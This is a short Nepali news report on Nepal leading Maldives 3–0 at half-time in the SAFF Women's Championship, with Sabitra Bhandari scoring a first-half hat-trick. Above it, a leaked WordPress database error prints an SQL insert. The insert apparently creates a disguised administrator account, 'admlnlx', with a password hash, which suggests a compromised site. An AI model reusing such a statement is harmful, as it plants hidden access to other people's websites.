WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV5rUVplta/f4/BGTvqqnOXEXRo70F.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 02:04:48', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १३–
भारतको सिलगुढीमा जारी चौथो संस्करणको साफ महिला च्याम्पियनसिपमा नेपाल अहिले माल्दिभ्ससंग प्रतिस्पर्धा गरिरहेको छ ।
खेलको पहिलो हाफमा नेपालकी सावित्रा भण्डारीले ३९ मिनेटभित्रै ह्याट्रीक पुरा गरेकी छन्।
कञ्चनजंघा रंगशालामा भइरहेको खेलमा पहिलो हाफसम्म नेपालले ३–०ले अग्रता लिएको छ। नेपालका लागि साबित्रा भण्डारीले १२, २८ र ३९औं मिनेटमा गोल गर्दै ह्याट्रिक पुरा गरेकी हुन्।